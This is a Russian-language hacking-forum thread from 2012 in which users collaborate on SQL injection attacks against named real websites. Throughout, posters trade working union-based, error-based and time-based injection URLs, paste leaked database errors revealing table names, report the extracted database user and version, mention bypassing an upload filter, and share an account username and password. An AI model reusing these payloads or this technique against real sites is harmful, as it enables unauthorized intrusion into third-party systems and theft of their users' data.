ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.08.2012, 16:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
7695
Репутация:
-5
|
|
а что изменится я вобще можно сказать чистый залил ) да там же только проверяется расширение и регулярными выражениями
|
|
|
|
02.08.2012, 09:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
7695
Репутация:
-5
|
|
Походу пмогло тк после залития открылись все почти деректории. хотя хз тк там перед залитием они переименовывают их походу так что неизвестно поч так произошло.
|
|
|
|
02.08.2012, 14:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
28549
Репутация:
6
|
|
Сообщение от BigBear
BigBear said:
Попробуй вот так:
Код:
Code:
/homepage.php?page=4&userid=1' union select 1,2,3,4,5 and 1='1
(подбирай кол-во полей в union практическим путём
или так
Код:
Code:
/homepage.php?page=4&userid=1' or @:=(@:=1)||@ group by concat((select @@version),!@)having@||min(@:=0) and 1='1
кол-во полей подобрать не смог
Сообщение от None
homepage.php?page=4&userid=1%27%20union%20select%2 01,2,3,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52, 53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69 ,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,8 6,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,1 02,103,104,105,106,107,108,109,110,111,112,113,114 ,115,116,117,118,119,120,121,122,123,124,125,126,1 27,128,129,130,131,132,133,134,135,136,137,138,139 ,140,141,142,143,144,145%20and%201='
всё время ошибка
Сообщение от None
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Y' order by priority, title limit 2' at line 2, occured in query: "select * from bcs_wishlist,bcs_product where bcs_wishlist.product_id = bcs_product.product_id and userid = '1' union select 1' and make_public = 'Y' order by priority, title limit 2".
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by bwcore_member.username limit 2' at line 3, occured in query: "select bwcore_member.username,bwcore_member.avatar_url,bc s_fav_vendor.* from bcs_fav_vendor,bwcore_member where bwcore_member.userid = bcs_fav_vendor.userid_vendor and bcs_fav_vendor.userid = '1' union select 1' order by bwcore_member.username limit 2".
побывал так
homepage.php?page=4&userid=1'+or+1=(select @@version)+and+1='1
ошибка исчезла но увы результат 0
|
|
|
|
02.08.2012, 14:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от Gaben7
Gaben7 said:
кол-во полей подобрать не смог
всё время ошибка
побывал так
homepage.php?page=4&userid=1'+or+1=(select @@version)+and+1='1
ошибка исчезла но увы результат 0
Попробуй
Сообщение от None
homepage.php?page=4&userid=1'or(select*from(select (name_const(version(),1)),name_const(version(),1)) a)and(1)='1
Браузер любой кроме firefox, да и пробелы убери
|
|
|
|
02.08.2012, 16:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
28549
Репутация:
6
|
|
Сообщение от OxoTnik
OxoTnik said:
Попробуй
Браузер любой кроме firefox, да и пробелы убери
пробовал в 3 браузерах результат тот же.
Там запятые фильтруются, backtick также фильтруется
попробовал так
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]homepage[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]userid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]dd1[/COLOR][COLOR="#DD0000"]'+union+select * from(select 0 a1) a1 join(select 0 a2) a2 join(select 0 a3) a3 join(select 0 a4) a4 join(select 0 a5) a5 join(select 0 a6) a6+union+select+* from(select username from bwcore_member limit 0)x join(select avatar_url from bwcore_member+limit+0)xx join(select * from bcs_fav_vendor+limit+0)xxx+--+a[/COLOR][/COLOR]
ответ
Код:
Code:
Fatal error: MySQL error: Too many connections in /rn1/renderosity/public_html/classes/class.bw_Database.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 162
|
|
|
|
02.08.2012, 16:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Дай линк, не мучай уже
|
|
|
|
02.08.2012, 16:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
28549
Репутация:
6
|
|
Сообщение от Melfis
Melfis said:
Дай линк, не мучай уже
да я давал удалили
www.renderosity.com
|
|
|
|
02.08.2012, 21:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
помогите плз тоже со скулей,вроде версия 5.5.14 но таблицы не хочет выводить
Код:
Code:
http://www.gameee.ru/iframe/rate.php?id=1543&i=1%20AND%20%28SELECT%203716%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a76746e3a,%28SELECT%20version%28%29%29,0x3a6f72743a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29--+f
|
|
|
|
03.08.2012, 08:34
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Faaax
Faaax said:
помогите плз тоже со скулей,вроде версия 5.5.14 но таблицы не хочет выводить
Код:
Code:
http://www.gameee.ru/iframe/rate.php?id=1543&i=1%20AND%20%28SELECT%203716%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a76746e3a,%28SELECT%20version%28%29%29,0x3a6f72743a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29--+f
Похоже и не выведет. Я смог покрутить только через Time-Based SQL
User: gameee_base@localhost
Sql: 5.5.14
DB: icmeee_base
Вот тебе 2 способа на выбор
Код:
Code:
http://www.gameee.ru/iframe/rate.php?id=1543&i=1+and+if(substring((version()),1,1)=5,BENCHMARK(100000,MD5(0x41)),0)
http://www.gameee.ru/iframe/rate.php?id=1543&i=1+and+sleep(substring((version()),1,1))
|
|
|
03.08.2012, 12:04
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Gaben7
Gaben7 said:
да я давал удалили
www.renderosity.com
Чёт меня постоянно в бан кидает. Надоели уже прокси.
Вот что накопал - последние 2 запроса не чекал тк, опять в бане.
Код:
Code:
http://www.renderosity.com/homepage.php?page=4&userid=1'+group+by+88+--+ FALSE
http://www.renderosity.com/homepage.php?page=4&userid=1'+group+by+87+--+ TRUE
http://www.renderosity.com/homepage.php?page=4&userid=1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87+--+
http://www.renderosity.com/homepage.php?page=4&userid=1'+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87+--+
Для авторизации можете заюзать мой акк BigBear-x/123456
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
